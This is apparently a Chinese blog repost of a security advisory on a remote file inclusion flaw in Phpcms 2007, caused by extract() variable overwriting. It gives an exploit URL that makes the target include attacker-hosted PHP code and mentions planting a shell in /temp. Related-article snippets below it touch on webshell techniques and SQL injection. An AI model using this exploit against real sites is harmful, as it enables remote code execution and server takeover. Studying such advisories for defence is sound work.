Phpcms 2007 远程文件包含漏洞

最新推荐文章于 2024-09-14 17:41:03 发布
最新推荐文章于 2024-09-14 17:41:03 发布
阅读量828 收藏
点赞数
分类专栏: 网络安全技术 文章标签: cms php login shell file url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/linkboy2004/article/details/2817192
版权
导读:
  PS:@extract函数。
  Phpcms 2007 远程文件包含漏洞
  Flyh4t [w.s.t]
  www.wolvez.org
  该cms的核心配置文件/include/common.inc.php有缺陷
  --------------------------------------------
  //23行开始
  @extract($_POST, EXTR_OVERWRITE);
  @extract($_GET, EXTR_OVERWRITE);
  unset($_POST, $_GET);
  ------------------------------------------------
  这里extract函数会导致变量覆盖,可能引发一系列的问题
  我们看/yp/admin.php,这个文件名字是挺吓人的,还带admin。但是注册个企业用户就可以访问该页面了,我们看部分代码
  ------------------------------------------------
  //从头开始看
  $rootdir = str_replace("//", '/', dirname(__FILE__));
  require $rootdir.'/include/common.inc.php';//通过extract可以覆盖$rootdir为任意值
  require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
  if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
  require $rootdir.'/web/admin/include/common.inc.php ';//触发远程文件包含
  ------------------------------------------------
  利用的方式可以先在你的网站 site.com上放置/web/admin/include/common.inc.php这样的目录和文件,当然common.inc.php就是你的恶意代码,然后注册个用户访问网站并提交
  http://target.com/yp/admin.php?Rootdir=http://site.com/即可。
  最后多说一句,php5默认不开启远程文件功能,如果想包含本地文件又要被gpc限制,所以看上去这个漏洞挺鸡肋的。不过qiuren同学提供了一个不错的方法,可以旁注一个shell写/web/admin/include/common.inc.php到/temp目录然后包含之
linkboy2004
关注
专栏目录
phpmyadmin 远程文件包含漏洞
ChenZIDu的博客
09-22 643
F12看到这个,查找source.php,发现源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"sou...
远程文件包漏洞,不能包含PHP的原因详解
qq_41631096的博客
03-06 507
远程文件包漏洞,不能包含PHP的原因详解 **简介:**进行远程包含时,大多数包含txt、jpg等文件,再进行菜刀连接,但是如果远程包含的是php文件,则菜刀无法成功连接。 开门见山,给我带来启发的两句话 **注意:**如果是包含远程服务器上的PHP文件,那么得到的是被远程服务器解析过的PHP,所以在写一句话木马的时候就不要做成.php的文件,一般包含.txt的文件 **例如:**我们用windo...
phpcms 2007 onunload.inc.php update SQL注入漏洞
weixin_30569153的博客
06-08 183
漏洞版本: phpcms 2007 漏洞描述: <!--?php defined('IN_PHPCMS') or exit('Access Denied'); $serverid ? 1 : showmessage($LANG['illegal_operation']); $db--->query("UPDATE ".TABLE_MOVIE_SERVER." SET ...
phpcms 2007 教程——默认模板的详细图文说明文档
besily的专栏
12-02 777
phpcms2007几个核心文件讲解
小白编程
07-09 119
include/common.inc.php &lt;?php /** 《PHPCMS2007 include/common.inc.php文件分析》 作者:fan12 (随便崇拜,不介意) 本人为大师级分析,高屋建瓴, 有想看细节分析的google搜“phpcms 源码分析”,有个叫逆水寒的写了几篇小兵级分析,写得很细,可以参考 ...
多字节%bf%27注入
weixin_30745641的博客
04-20 904
渗透测试,注入是很常见的手法了。记得有个很经典的多字节编码漏洞。其漏洞引发的原理是:0xbf27不是有一个有效的GBK字符,但是经过addslashed()转换后就变成0xbf5c27,0xbf5c是个有效的GBK字符,所以0xbf5c27会当作一个字符0xbf5c和一个单绰号来处理,结果是跟在引号后查询语句得到了执行。在phpcms2007程序里由多字节编码漏洞引发的漏洞有多个,以area.ph...
PHPCMS v9本地文件包含漏洞Getshell
fansenliangren的博客
12-01 1480
文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果......
phpcmsv9最新利用工具
04-01
phpcmsV9作为一款基于PHP语言开发的CMS,同样可能存在代码层面的漏洞,例如SQL注入、跨站脚本(XSS)、文件包含漏洞等。 SQL注入是常见的漏洞类型之一,当用户输入的数据未经充分过滤或转义,直接拼接到SQL查询语句...
XSS跨站脚本攻击剖析与防御.docx
09-16
XSS跨站脚本攻击剖析与防御.docx
PHPCMS-2008远程代码执行1
08-03
PHPCMS-2008远程代码执行漏洞详解 PHPCMS是一款基于PHP语言开发的内容管理系统,广泛应用于网站构建。然而,该系统在2008版本中存在一个严重的远程代码执行(RCE)漏洞,被命名为CVE-2018-19127。这个漏洞允许攻击...
phpcms2008漏洞利用工具
10-13
文件包含漏洞允许攻击者通过动态加载远程或本地文件,执行非预期的代码;XSS攻击则可以盗取用户cookie,实现会话劫持;命令执行漏洞可能导致服务器执行攻击者指定的系统命令。 了解了这些漏洞类型后,我们来看...
phpcms安全漏洞合集
linhui03的博客
02-14 3377
1、宽字节注入漏洞 /phpcms/modules/pay/respond.php位置约16行 原来代码 $payment = $this->get_by_code($_GET['code']); 替换为 $payment = $this->get_by_code(mysql_real_escape_string($_GET['code'])); 2、phpcms注...
phpcms漏洞总结
草巾冒小子的博客
06-25 6820
本文旨在phpcms常见漏洞的发现与修复 重点内容 : 这里收录了phpcms一些常见的漏洞和补丁方案。 希望能对学习该框架的程序员,有所助益。
phpcms 漏洞
erjian666的博客
11-02 2895
这个漏洞是某司的一位前辈发出来的,这里只是复现一下而已。 原文地址:https://www.t00ls.net/thread-39226-1-1.html 首先我们本地搭建一个phpcms9.6.0的环境 下载地址:http://www.mycodes.net/43/3365.htm   点击注册页面,进行抓包 在本地创建一个txt文本,写入一句话木马 POC s...
phpcms 漏洞姿势
热门推荐
2ed
06-26 2万+
一 .PHPCMS V9本地文件包含漏洞 漏洞出现在如下文件:phpcms/modules/search/index.php 代码如下: 本处大家会发现在使用file_get_contents函数时没有过滤get方式得到的m参数 因此可以构造payload如下 www.xxx.com/m=search&a=public_get_suggest_keyword&q=../../ph...
php代码审计【21】phpcms2008 漏洞挖掘报错注入
司徒荆的博客
07-07 675
phpcms2008 漏洞挖掘
SEAFARING靶场渗透
kknifek的博客
09-13 570
??echo '<??
dedecms(四种webshell姿势)
最新发布
2301_81881972的博客
09-14 1000
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
PHPCMS 2008远程代码执行漏洞分析与利用
在本文中,我们将深入探讨一个针对PHPCMS 2008版本的重大安全漏洞,该漏洞被称为“PHPCMS-2008远程代码执行1”,并关联了CVE-2018-19127。这个漏洞允许攻击者执行任意远程代码,从而可能导致系统被完全控制。 0x01 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值